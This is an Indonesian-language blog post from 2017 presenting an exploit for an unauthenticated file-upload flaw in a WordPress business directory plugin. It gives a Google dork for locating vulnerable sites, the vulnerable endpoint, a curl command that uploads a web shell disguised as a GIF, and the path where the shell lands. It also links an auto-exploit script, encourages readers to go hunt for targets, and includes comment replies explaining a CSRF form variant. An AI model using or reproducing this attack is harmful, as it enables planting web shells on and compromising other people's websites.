Saturday, 3 June 2017

WordPress Business Directory Plugin File Upload


Exploit Title: WordPress Business Directory Plugin File Upload
Author: Jingklong ( Bahari Trouble Maker )



Google Dork: inurl:/wp-content/ inurl:/business-directory-plugin
Vuln Path: /wp-admin/admin-ajax.php?action=wpbdp-file-field-upload

Example Target:
http://target.com/wp-admin/admin-ajax.php?action=wpbdp-file-field-upload

( Vuln Target )
Exploit:
1. CSRF


2. CURL POST
root # curl -v -k -F "file=@shell.gif" "http://target.com/wp-admin/admin-ajax.php?action=wpbdp-file-field-upload"

Uplod file anda dengan format .gif/.jpg/.png

Hasil upload anda bisa dicari di:
http://target.com//wp-content/uploads/2017/06/shell.gif


Download:
Auto Exploit (BASH): https://pastebin.com/Wk904pU9


Oke, selamat mencari target :D

8 comments:

  1. bang agus,ini harus pakek linux ya? kalo gk pakek gimana bang?

    ReplyDelete
    Replies
    1. gapake linux juga bisa, pake csrf nya

      Delete
  2. Bang csrf dari mana ,sorry neubi

    ReplyDelete
    Replies
    1. itu ada ss scriptnya gan, tulis ulang aja :v

      Delete
    2. simpen dengan extensi/format .html
      taro aja di local disknya, abis itu buka filenya

      ganti bagian target="http://targetlu.com/wp-admin/admin-ajax.php?action=wpbdp-file-field-upload" isi target lu

      Delete
  3. bang ajarin tolongin ane cara biar root terminal devie kayagitu

    ReplyDelete